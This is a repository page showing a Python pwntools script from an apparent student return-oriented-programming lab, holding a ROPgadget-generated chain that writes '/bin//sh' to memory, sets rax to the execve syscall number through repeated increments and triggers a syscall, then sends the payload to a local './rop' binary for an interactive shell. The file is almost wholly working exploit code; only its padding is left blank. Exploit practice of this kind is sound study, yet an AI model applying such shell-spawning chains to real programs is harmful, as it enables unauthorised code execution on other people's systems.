lucas.evard
/
ROP-TP
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '5f0619125a'
${ noResults }
ROP-TP/tpattempt/pyscript

95 lines
3.8 KiB
Raw Blame History

#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
from pwn import *
# Padding goes here
p = b''
r = process('./rop')
p += p64(0x00000000004077ce) # pop rsi ; ret
p += p64(0x00000000004b2000) # @ .data
p += p64(0x00000000004437e3) # pop rax ; ret
p += b'/bin//sh'
p += p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret
p += p64(0x00000000004077ce) # pop rsi ; ret
p += p64(0x00000000004b2008) # @ .data + 8
p += p64(0x0000000000439720) # xor rax, rax ; ret
p += p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret
p += p64(0x00000000004017de) # pop rdi ; ret
p += p64(0x00000000004b2000) # @ .data
p += p64(0x00000000004077ce) # pop rsi ; ret
p += p64(0x00000000004b2008) # @ .data + 8
p += p64(0x00000000004016fb) # pop rdx ; ret
p += p64(0x00000000004b2008) # @ .data + 8
p += p64(0x0000000000439720) # xor rax, rax ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x00000000004660d0) # add rax, 1 ; ret
p += p64(0x000000000040120b) # syscall
# print(p)
r.sendline(p)
r.interactive()
Reference in new issue View Git Blame Copy Permalink